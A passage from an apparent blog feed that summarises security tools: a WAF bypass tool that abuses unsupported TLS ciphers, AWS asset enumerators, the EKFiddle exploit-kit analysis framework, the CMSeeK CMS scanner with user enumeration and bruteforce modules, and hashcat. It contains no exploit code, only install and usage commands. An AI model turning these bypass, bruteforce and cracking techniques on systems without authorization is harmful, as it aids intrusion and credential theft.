WAF Buster – Disrupt WAF By Abusing SSL/TLS Ciphers

Disrupt WAF by abusing SSL/TLS CiphersAbout WAF_busterThis tool was created to Analyze the ciphers that are supported by the Web application firewall being used at the web server end. (Reference: https://0x09al.github.io/waf/bypass/ssl/2018/07/02/web-application-firewall-bypass.html) It works by first triggering SslScan to look for all the supported ciphers during SSL/TLS negotiation with the web server.After getting the text file of all the supported ciphers, then we use Curl to query web server with each and every Cipher to check which of the ciphers are unsupported by WAF and supported by Web server , if any such Cipher is found then a message is displayed that “Firewall is bypassed".ScreenshotsInstallationgit clone https://github.com/viperbluff/WAF_buster.git Python2This tool has been created using Python2 and below modules have been used throughout:-1.requests2.os3.sys4.subprocessUsage Open terminal python2 WAF_buster.py –inputDownload WAF_buster

Link: http://feedproxy.google.com/~r/PentestTools/~3/0fQO7UVapz0/waf-buster-disrupt-waf-by-abusing.html

Aws_Public_Ips – Fetch All Public IP Addresses Tied To Your AWS Account

aws_public_ips is a tool to fetch all public IP addresses (both IPv4/IPv6) associated with an AWS account.It can be used as a library and as a CLI, and supports the following AWS services (all with both Classic & VPC flavors):APIGatewayCloudFrontEC2 (and as a result: ECS, EKS, Beanstalk, Fargate, Batch, & NAT Instances)ElasticSearchELB (Classic ELB)ELBv2 (ALB/NLB)LightsailRDSRedshiftIf a service isn’t listed (S3, ElastiCache, etc) it’s most likely because it doesn’t have anything to support (i.e. it might not be deployable publicly, it might have all ip addresses resolve to global AWS infrastructure, etc).Quick startInstall the gem and run it:$ gem install aws_public_ips# Uses default ~/.aws/credentials$ aws_public_ips52.84.11.1352.84.11.832600:9000:2039:ba00:1a:cd27:1440:93a12600:9000:2039:6e00:1a:cd27:1440:93a1# With a custom profile$ AWS_PROFILE=production aws_public_ips52.84.11.159CLI reference$ aws_public_ips –helpUsage: aws_public_ips [options] -s, –services ,<s2>,<s3> List of AWS services to check. Available services: apigateway,cloudfront,ec2,elasticsearch,elb,elbv2,lightsail,rds,redshift. Defaults to all. -f, –format <format> Set output format. Available formats: json,prettyjson,text. Defaults to text. -v, –[no-]verbose Enable debug/trace output –version Print version -h, –help Show this help messageConfigurationFor authentication aws_public_ips uses the default aws-sdk-ruby configuration, meaning that the following are checked in order:Environment variables:AWS_ACCESS_KEY_IDAWS_SECRET_ACCESS_KEYAWS_REGIONAWS_PROFILEShared credentials files:~/.aws/credentials~/.aws/configInstance profile via metadata endpoint (if running on EC2, ECS, EKS, or Fargate)For more information see the AWS SDK documentation on configuration.IAM permissionsTo find the public IPs from all AWS services, the minimal policy needed by your IAM user is:{ “Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": [ "apigateway:GET", "cloudfront:ListDistributions", "ec2:DescribeInstances", "elasticloadbalancing:DescribeLoadBalancers", "lightsail:GetInstances", "lightsail:GetLoadBalancers", "rds:DescribeDBInstances", "redshift:DescribeClusters" ], "Resource": "*" } ]}ContactFeel free to tweet or direct message: @arkadiytDownload Aws_Public_Ips

Link: http://feedproxy.google.com/~r/PentestTools/~3/aLYdLNP_wx4/awspublicips-fetch-all-public-ip.html

Resource-Counter – This Command Line Tool Counts The Number Of Resources In Different Categories Across Amazon Regions

This command line tool counts the number of resources in different categories across Amazon regions.This is a simple Python app that will count resources across different regions and display them on the command line. It first shows the dictionary of the results for the monitored services on a per-region basis, then it shows totals across all regions in a friendlier format. It tries to use the most-efficient query mechanism for each resource in order to manage the impact of API activity. I wrote this to help me scope out assessments and know where resources are in a target account.The development plan is to upgrade the output (probably to CSV file) and to continue to add services. If you have a specific service you want to see added just add a request in the comments.The current list incluides:Application and Network Load BalancersAutoscale GroupsClassic Load BalancersCloudTrail TrailsCloudwatch RulesConfig RulesDynamo TablesElastic IP AddressesGlacier VaultsIAM GroupsImagesInstancesKMS KeysLambda FunctionsLaunch ConfigurationsNAT GatewaysNetwork ACLsIAM PoliciesRDS InstancesIAM RolesS3 BucketsSAML ProvidersSNS TopicsSecurity GroupsSnapshotsSubnetsIAM UsersVPC EndpointsVPC Peering ConnectionVPCsVolumesUsage:To install just copy it where you want it and instally the requirements:pip install -r ./requirements.txtThis was written in Python 3.6.To run:python count_resources.py By default, it will use whatever AWS credentials are alerady configued on the system. You can also specify an access key/secret at runtime and this is not stored. It only neeeds read permissions for the listed services- I use the ReadOnlyAccess managed policy, but you should also be able to use the SecurityAudit policy.Usage: count_resources.py [OPTIONS]Options: –access TEXT AWS Access Key. Otherwise will use the standard credentials path for the AWS CLI. –secret TEXT AWS Secret Key –profile TEXT If you have multiple credential profiles, use this option to specify one. –help Show this message and exit.Sample Output:Establishing AWS session using the profile- dev Current account ID: xxxxxxxxxx Counting resources across regions. This will take a few minutes…Resources by region {‘ap-northeast-1’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘ap-northeast-2’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 2, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘ap-south-1’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 2, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘ap-southeast-1’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘ap-southeast-2’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘ca-central-1’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 2, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘eu-central-1’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘eu-west-1’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘eu-west-2’: {‘instances’: 3, ‘volumes’: 3, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘eu-west-3’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘sa-east-1’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 1, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘us-east-1’: {‘instances’: 2, ‘volumes’: 2, ‘security_groups’: 19, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 2, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 2, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 1, ‘cloudtrail trails’: 2, ‘sns topics’: 3, ‘kms keys’: 5, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘us-east-2’: {‘instances’: 0, ‘volumes’: 0, ‘security_groups’: 2, ‘snapshots’: 0, ‘images’: 0, ‘vpcs’: 1, ‘subnets’: 3, ‘peering connections’: 0, ‘network ACLs’: 1, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 0, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘us-west-1’: {‘instances’: 1, ‘volumes’: 3, ‘security_groups’: 14, ‘snapshots’: 1, ‘images’: 0, ‘vpcs’: 0, ‘subnets’: 0, ‘peering connections’: 0, ‘network ACLs’: 0, ‘elastic IPs’: 0, ‘NAT gateways’: 0, ‘VPC Endpoints’: 0, ‘autoscale groups’: 0, ‘launch configurations’: 0, ‘classic load balancers’: 0, ‘application and network load balancers’: 0, ‘lambdas’: 0, ‘glacier vaults’: 0, ‘cloudwatch rules’: 0, ‘config rules’: 0, ‘cloudtrail trails’: 1, ‘sns topics’: 0, ‘kms keys’: 1, ‘dynamo tables’: 0, ‘rds instances’: 0}, ‘us-west-2’: {‘instances’: 9, ‘volumes’: 29, ‘security_groups’: 76, ‘snapshots’: 171, ‘images’: 104, ‘vpcs’: 7, ‘subnets’: 15, ‘peering connections’: 1, ‘network ACLs’: 8, ‘elastic IPs’: 7, ‘NAT gateways’: 1, ‘VPC Endpoints’: 0, ‘autoscale groups’: 1, ‘launch configurations’: 66, ‘classic load balancers’: 1, ‘application and network load balancers’: 2, ‘lambdas’: 10, ‘glacier vaults’: 1, ‘cloudwatch rules’: 8, ‘config rules’: 1, ‘cloudtrail trails’: 1, ‘sns topics’: 6, ‘kms keys’: 7, ‘dynamo tables’: 1, ‘rds instances’: 0}}Resource totals across all regions Application and Network Load Balancers : 2 Autoscale Groups : 1 Classic Load Balancers : 1 CloudTrail Trails : 16 Cloudwatch Rules : 8 Config Rules : 2 Dynamo Tables : 1 Elastic IP Addresses : 7 Glacier Vaults : 1 Groups : 12 Images : 104 Instances : 15 KMS Keys : 13 Lambda Functions : 10 Launch Configurations : 66 NAT Gateways : 1 Network ACLs : 22 Policies : 15 RDS Instances : 0 Roles : 40 S3 Buckets : 31 SAML Providers : 1 SNS Topics : 9 Security Groups : 122 Snapshots : 172 Subnets : 51 Users : 14 VPC Endpoints : 0 VPC Peering Connections : 1 VPCs : 21 Volumes : 37Total resources: 796Download Resource-Counter

Link: http://feedproxy.google.com/~r/PentestTools/~3/0QCDjS_vnjY/resource-counter-this-command-line-tool.html

EKFiddle – A Framework Based On The Fiddler Web Debugger To Study Exploit Kits, Malvertising And Malicious Traffic In General

A framework based on the Fiddler web debugger to study Exploit Kits, malvertising and malicious traffic in general.InstallationDownload and install the latest version of Fiddlerhttps://www.telerik.com/fiddlerSpecial instructions for Linux and Mac here:https://www.telerik.com/blogs/fiddler-for-linux-beta-is-herehttps://www.telerik.com/blogs/introducing-fiddler-for-os-x-beta-1Enable C# scripting (Windows only)Launch Fiddler, and go to Tools -> OptionsIn the Scripting tab, change the default (JScript.NET) to C#.Change default text editor (optional)In the same Tools -> Options menu, click on the Tools tab.Windows: notepad.exe or notepad++.exeLinux: geditMac: /Applications/TextEdit.app or /Applications/TextWrangler.appClose FiddlerDownload or clone CustomRules.cs into the appropriate folder based on your operating system:Windows (7/10) C:\Users\[username]\Documents\Fiddler2\Scripts\ Ubuntu /home/[username]/Fiddler2/Scripts/ Mac /Users/[username]/Fiddler2/Scripts/ Finish up the installationStart Fiddler to complete the installation of EKFiddle. That’s it, you’re all set!FeaturesToolbar buttonsThe added toolbar buttons give you quick shortcuts to some of the main features:QuickSaveDumps current web sessions into a SAZ named (QuickSave-“MM-dd-yyyy-HH-mm-ss".saz) to EKFiddle\Captures.UI modeToggle between the default column view or extra columns with additional information (includes time stamp, server IP and type, method, etc.).VPNVPN GUI directly built into Fiddler. It uses the OpenVPN client on Windows and Linux with ovpn files (sigining up with commercial VPN provider may be required). It will open up a new terminal/xterm whenever it connects to a new server via the selected .ovpn config file, killing the previous to ensure only one TAP adapter is used at any given time.WindowsDownload and install OpenVPN in default directoryPlace your .ovpn files inside OpenVPN’s config folder.Linux (tested on Ubuntu 16.04)sudo apt-get install openvpnPlace your .ovpn files in /etc/openvpn.ProxyAllows you to connect to an upstream proxy (HTTP/s or SOCKS).Import SAZ/PCAPA shortcut to load SAZ (Fiddler’s native format) or PCAP (i.e. from Wireshark) captures.View/Edit RegexesView and create your custom regular expressions. Note: a master list is provided with auto-updates via GitHub. Additionally the custom list lets you create your own rules.Run RegexesRun the master and custom regular expressions against current web sessions.Clear MarkingsClear any comment and colour highlighting in the currently loaded sessions.ContextAction menuThe ContextAction menu (accessed by right-clicking on any session(s) allows you to perform additional commands on selected sections. This can be very helpful to do quick lookups, compute hashes or extract IOCs.Hostname or IP address (Google Search, RiskIQ, URLQuery, RiskIQ)Query the hostname for the currently selected session.URIBuild RegexCreate a regular expression from the currently selected URI. This action opens up a regex website and the URI is already in the clipboard, ready to be pasted into the query field.Open in… Internet Explorer, Chrome, Firefox, EdgeThis opens up the URI with the browser you selected.Response BodyRemove encodingDecodes the currently selected sessions (from their basic encoding).Build RegexCreate a regular expression from the currently selected session’s source code. This action opens up a regex website and the URI is already in the clipboard, ready to be pasted into the query field.Calculate MD5/SHA256 hashGet the current session’s body and computes its hash.Hybrid Analysis / VirusTotal lookupChecks the current session’s body for hash, then look up that hash.Extract to DiskDownloads the currently selection session(s)’s body to disk, into the ‘Artifacts’ folder.Extract IOCsCopies into memory basic information from selected sessions so that they can be shared as IOCs.Connect-the-dotsAllows you to identify the sequence of events between sessions. Right-clik on the session you are interested in retracing your steps to and simply ‘connect the dots’. It will label the sequence of events from 01, to n within the comments column. You can reorder that column to have a condensed view of the sequence.CrawlerLoad a list of URLs from a text file and let the browser automically visit them. Tools -> Crawler (experimental) -> Start crawler May require some tweaks in your browser’s settings, in particular with regards to crash recovery IE: not needed Firefox: about:config, set -1 value for toolkit.startup.max_resumed_crashes Chrome: not needed Edge: fix already includedUninstalling EKFiddleDelete CustomRules.csDownload EKFiddle

Link: http://feedproxy.google.com/~r/PentestTools/~3/OrfyeIMprN4/ekfiddle-framework-based-on-fiddler-web.html

CMSeeK v1.0.7 – CMS Detection And Exploitation Suite (Scan WordPress, Joomla, Drupal And 50 Other CMSs)

What is a CMS?A content management system (CMS) manages the creation and modification of digital content. It typically supports multiple users in a collaborative environment. Some noteable examples are: WordPress, Joomla, Drupal etc.Release History- Version 1.0.7 [07-08-2018]- Version 1.0.6 [23-07-2018]- Version 1.0.5 [19-07-2018]- Version 1.0.4 [17-07-2018]- Version 1.0.3 [06-07-2018]- Version 1.0.2 [06-07-2018]- Version 1.0.1 [19-06-2018]- Version 1.0.0 [15-06-2018]Changelog FileFunctions Of CMSeek:Basic CMS Detection of over 30 CMSDrupal version detectionAdvanced WordPress ScansDetects VersionUser EnumerationPlugins EnumerationTheme EnumerationDetects Users (3 Detection Methods)Looks for Version Vulnerabilities and much more!Advanced Joomla ScansVersion detectionBackup files finderAdmin page finderCore vulnerability detectionDirectory listing checkConfig leak detectionVarious other checksModular bruteforce systemUse pre made bruteforce modules or create your own and integrate with itRequirements and Compatibility:CMSeeK is built using python3, you will need python3 to run this tool and is compitable with unix based systems as of now. Windows support will be added later. CMSeeK relies on git for auto-update so make sure git is installed.Installation and Usage:It is fairly easy to use CMSeeK, just make sure you have python3 and git (just for cloning the repo) installed and use the following commands:git clone https://github.com/Tuhinshubhra/CMSeeKcd CMSeeKFor guided scanning:python3 cmseek.pyElse:python3 cmseek.py -u […]Help menu from the program:USAGE: python3 cmseek.py (for a guided scanning) OR python3 cmseek.py [OPTIONS] <Target Specification>SPECIFING TARGET: -u URL, –url URL Target Url -l LIST, -list LIST path of the file containing list of sites for multi-site scan (comma separated)USER AGENT: -r, –random-agent Use a random user agent –user-agent USER_AGENT Specify custom user agentOUTPUT: -v, –verbose Increase output verbosityVERSION & UPDATING: –update Update CMSeeK (Requires git) –version Show CMSeeK version and exitHELP & MISCELLANEOUS: -h, –help Show this help message and exit –clear-result Delete all the scan resultEXAMPLE USAGE: python3 cmseek.py -u example.com # Scan example.com python3 cmseek.py -l /home/user/target.txt # Scan the sites specified in target.txt (comma separated) python3 cmseek.py -u example.com –user-agent Mozilla 5.0 # Scan example.com using custom user-Agent Mozilla is 5.0 used here python3 cmseek.py -u example.com –random-agent # Scan example.com using a random user-Agent python3 cmseek.py -v -u example.com # enabling verbose output while scanning example.comChecking For Update:You can check for update either from the main menu or use python3 cmseek.py –update to check for update and apply auto update.P.S: Please make sure you have git installed, CMSeeK uses git to apply auto update.Detection Methods:CMSeek detects CMS via the following:HTTP HeadersGenerator meta tagPage source coderobots.txtSupported CMSs:CMSeeK currently can detect 40 CMSs, you can find the list on cmss.py file which is present in the cmseekdb directory. All the cmss are stored in the following way: cmsID = { ‘name’:’Name Of CMS’, ‘url’:’Official URL of the CMS’, ‘vd’:’Version Detection (0 for no, 1 for yes)’, ‘deeps’:’Deep Scan (0 for no 1 for yes)’ }Scan Result:All of your scan results are stored in a json file named cms.json, you can find the logs inside the Result\<Target Site> directory, and as of the bruteforce results they’re stored in a txt file under the site’s result directory as well.Here is an example of the json report log:Bruteforce Modules:CMSeek has a modular bruteforce system meaning you can add your custom made bruteforce modules to work with cmseek. A proper documentation for creating modules will be created shortly but in case you already figured out how to (pretty easy once you analyze the pre-made modules) all you need to do is this:Add a comment exactly like this # <Name Of The CMS> Bruteforce module. This will help CMSeeK to know the name of the CMS using regex Add another comment ### cmseekbruteforcemodule, this will help CMSeeK to know it is a module Copy and paste the module in the brutecms directory under CMSeeK’s directory Open CMSeeK and Rebuild Cache using U as the input in the first menu. If everything is done right you’ll see something like this (refer to screenshot below) and your module will be listed in bruteforce menu the next time you open CMSeeK.Need More Reasons To Use CMSeeK?If not anything you can always enjoy exiting CMSeeK (please don’t), it will bid you goodbye in a random goodbye message in various languages.Also you can try reading comments in the code those are pretty random and weird!!!Screenshots:Download CMSeeK

Link: http://feedproxy.google.com/~r/PentestTools/~3/vbiJSfGmARQ/cmseek-v107-cms-detection-and.html

Hashcat v4.2.1 – World’s Fastest and Most Advanced Password Recovery Utility

hashcat is the world’s fastest and most advanced password recovery utility, supporting five unique modes of attack for over 200 highly-optimized hashing algorithms. hashcat currently supports CPUs, GPUs, and other hardware accelerators on Linux, Windows, and OSX, and has facilities to help enable distributed password cracking. Installation Download the latest release and unpack it in the desired location. Please remember to use 7z x when unpacking the archive from the command line to ensure full file paths remain intact.GPU Driver requirements:AMD GPUs on Windows require “AMD Radeon Software Crimson Edition" (15.12 or later)AMD GPUs on Linux require "AMDGPU-PRO Driver" (16.40 or later)Intel CPUs require "OpenCL Runtime for Intel Core and Intel Xeon Processors" (16.1.1 or later)Intel GPUs on Windows require "OpenCL Driver for Intel Iris and Intel HD Graphics"Intel GPUs on Linux require "OpenCL 2.0 GPU Driver Package for Linux" (2.0 or later)NVIDIA GPUs require "NVIDIA Driver" (367.x or later)FeaturesWorld’s fastest password crackerWorld’s first and only in-kernel rule engineFreeOpen-Source (MIT License)Multi-OS (Linux, Windows and OSX)Multi-Platform (CPU, GPU, DSP, FPGA, etc., everything that comes with an OpenCL runtime)Multi-Hash (Cracking multiple hashes at the same time)Multi-Devices (Utilizing multiple devices in same system)Multi-Device-Types (Utilizing mixed device types in same system)Supports distributed cracking networks (using overlay)Supports interactive pause / resumeSupports sessionsSupports restoreSupports reading password candidates from file and stdinSupports hex-salt and hex-charsetSupports automatic performance tuningSupports automatic keyspace ordering markov-chainsBuilt-in benchmarking systemIntegrated thermal watchdog200+ Hash-types implemented with performance in mind… and much moreAlgorithmsMD4MD5Half MD5 (left, mid, right)SHA1SHA-224SHA-256SHA-384SHA-512SHA-3 (Keccak)BLAKE2b-512SipHashSkip32RIPEMD-160WhirlpoolDES (PT = $salt, key = $pass)3DES (PT = $salt, key = $pass)ChaCha20GOST R 34.11-94GOST R 34.11-2012 (Streebog) 256-bitGOST R 34.11-2012 (Streebog) 512-bitmd5($pass.$salt)md5($salt.$pass)md5(unicode($pass).$salt)md5($salt.unicode($pass))md5($salt.$pass.$salt)md5($salt.md5($pass))md5($salt.md5($salt.$pass))md5($salt.md5($pass.$salt))md5(md5($pass))md5(md5($pass).md5($salt))md5(strtoupper(md5($pass)))md5(sha1($pass))sha1($pass.$salt)sha1($salt.$pass)sha1(unicode($pass).$salt)sha1($salt.unicode($pass))sha1(sha1($pass))sha1($salt.sha1($pass))sha1(md5($pass))sha1($salt.$pass.$salt)sha1(CX)sha256($pass.$salt)sha256($salt.$pass)sha256(unicode($pass).$salt)sha256($salt.unicode($pass))sha512($pass.$salt)sha512($salt.$pass)sha512(unicode($pass).$salt)sha512($salt.unicode($pass))HMAC-MD5 (key = $pass)HMAC-MD5 (key = $salt)HMAC-SHA1 (key = $pass)HMAC-SHA1 (key = $salt)HMAC-SHA256 (key = $pass)HMAC-SHA256 (key = $salt)HMAC-SHA512 (key = $pass)HMAC-SHA512 (key = $salt)PBKDF2-HMAC-MD5PBKDF2-HMAC-SHA1PBKDF2-HMAC-SHA256PBKDF2-HMAC-SHA512MyBBphpBB3SMF (Simple Machines Forum)vBulletinIPB (Invision Power Board)WBB (Woltlab Burning Board)osCommercext:CommercePrestaShopMediaWiki B typeWordPressDrupal 7JoomlaPHPSDjango (SHA-1)Django (PBKDF2-SHA256)EpiserverColdFusion 10+Apache MD5-APRMySQLPostgreSQLMSSQLOracle H: Type (Oracle 7+)Oracle S: Type (Oracle 11+)Oracle T: Type (Oracle 12+)SybasehMailServerDNSSEC (NSEC3)IKE-PSKIPMI2 RAKPiSCSI CHAPCRAM-MD5MySQL CRAM (SHA1)PostgreSQL CRAM (MD5)SIP digest authentication (MD5)WPA/WPA2WPA/WPA2 PMKNetNTLMv1NetNTLMv1+ESSNetNTLMv2Kerberos 5 AS-REQ Pre-Auth etype 23Kerberos 5 TGS-REP etype 23Netscape LDAP SHA/SSHAFileZilla ServerLMNTLMDomain Cached Credentials (DCC), MS CacheDomain Cached Credentials 2 (DCC2), MS Cache 2DPAPI masterkey file v1 and v2MS-AzureSync PBKDF2-HMAC-SHA256descryptbsdicryptmd5cryptsha256cryptsha512cryptbcryptscryptmacOS v10.4macOS v10.5macOS v10.6macOS v10.7macOS v10.8macOS v10.9macOS v10.10iTunes backup < 10.0iTunes backup >= 10.0AIX {smd5}AIX {ssha1}AIX {ssha256}AIX {ssha512}Cisco-ASA MD5Cisco-PIX MD5Cisco-IOS $1$ (MD5)Cisco-IOS type 4 (SHA256)Cisco $8$ (PBKDF2-SHA256)Cisco $9$ (scrypt)Juniper IVEJuniper NetScreen/SSG (ScreenOS)Juniper/NetBSD sha1cryptFortigate (FortiOS)Samsung Android Password/PINWindows Phone 8+ PIN/passwordGRUB 2CRC32RACFRadmin2RedminePunBBOpenCartAtlassian (PBKDF2-HMAC-SHA1)Citrix NetScalerSAP CODVN B (BCODE)SAP CODVN F/G (PASSCODE)SAP CODVN H (PWDSALTEDHASH) iSSHA-1PeopleSoftPeopleSoft PS_TOKENSkypeWinZip7-ZipRAR3-hpRAR5AxCryptAxCrypt in-memory SHA1PDF 1.1 – 1.3 (Acrobat 2 – 4)PDF 1.4 – 1.6 (Acrobat 5 – 8)PDF 1.7 Level 3 (Acrobat 9)PDF 1.7 Level 8 (Acrobat 10 – 11)MS Office <= 2003 MD5MS Office <= 2003 SHA1MS Office 2007MS Office 2010MS Office 2013Lotus Notes/Domino 5Lotus Notes/Domino 6Lotus Notes/Domino 8Bitcoin/Litecoin wallet.datBlockchain, My WalletBlockchain, My Wallet, V21Password, agilekeychain1Password, cloudkeychainLastPassPassword Safe v2Password Safe v3KeePass 1 (AES/Twofish) and KeePass 2 (AES)JKS Java Key Store Private Keys (SHA1)Ethereum Wallet, PBKDF2-HMAC-SHA256Ethereum Wallet, SCRYPTeCryptfsAndroid FDE <= 4.3Android FDE (Samsung DEK)TrueCryptVeraCryptLUKSPlaintextAttack-ModesStraight *CombinationBrute-forceHybrid dict + maskHybrid mask + dict* accept RulesSupported OpenCL runtimesAMDAppleIntelMesa (Gallium)NVidiapoclSupported OpenCL device typesGPUCPUAPUDSPFPGACoprocessor Download Hashcat

Link: http://feedproxy.google.com/~r/PentestTools/~3/sNwcnDbkMkE/hashcat-v421-worlds-fastest-and-most.html

Social Mapper – A Social Media Enumeration & Correlation Tool

